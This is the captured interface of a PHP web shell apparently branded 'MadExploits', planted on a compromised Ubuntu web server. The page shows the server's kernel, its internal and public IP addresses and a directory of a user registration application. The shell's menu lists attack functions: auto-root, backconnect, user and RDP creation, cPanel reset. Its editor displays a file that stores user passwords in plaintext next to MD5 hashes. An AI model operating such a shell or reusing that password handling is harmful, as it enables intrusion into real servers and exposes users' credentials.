Linux 0193-eed-moe-app01 5.15.0-46-generic #49-Ubuntu SMP Thu Aug 4 18:03:25 UTC 2022 x86_64
Apache/2.4.52 (Ubuntu)
: 172.16.229.234 | : 18.221.182.97
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.18
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
eedpims /
userregistration /
[ HOME SHELL ]
Name
Size
Permission
Action
ajaxoffice.php
520
B
-rw-r--r--
message.php
469
B
-rw-r--r--
userinfo.php
1007
B
-rw-r--r--
userinfo_editor.php
6.27
KB
-rw-r--r--
userinfo_list.php
6.17
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : userinfo.php
<?php include("../common/functions.php"); include("../common/config.php"); $cmd = $_REQUEST["cmd"]; switch($cmd) { case "add": if(empty($_REQUEST["id"])) { $stmt = $conn->prepare("INSERT INTO userinfo (uname,username,upassword,mobileno,dumpass,office_id,designation,districtoffice_id) VALUES (?,?,?,?,?,?,?,?)"); $stmt->bind_param("sssssisi", trim($_REQUEST['uname']),$_REQUEST['username'],md5(trim($_REQUEST["upassword"])),$_REQUEST['mobileno'], trim($_REQUEST['upassword']), $_REQUEST['office_id'],$_REQUEST['designation'],$_REQUEST['districtoffice_id']); $stmt->execute(); $stmt->close(); } Header("Location: ../userregistration/message.php"); break; default : include("../userregistration/userinfo_editor.php"); } ?>
Close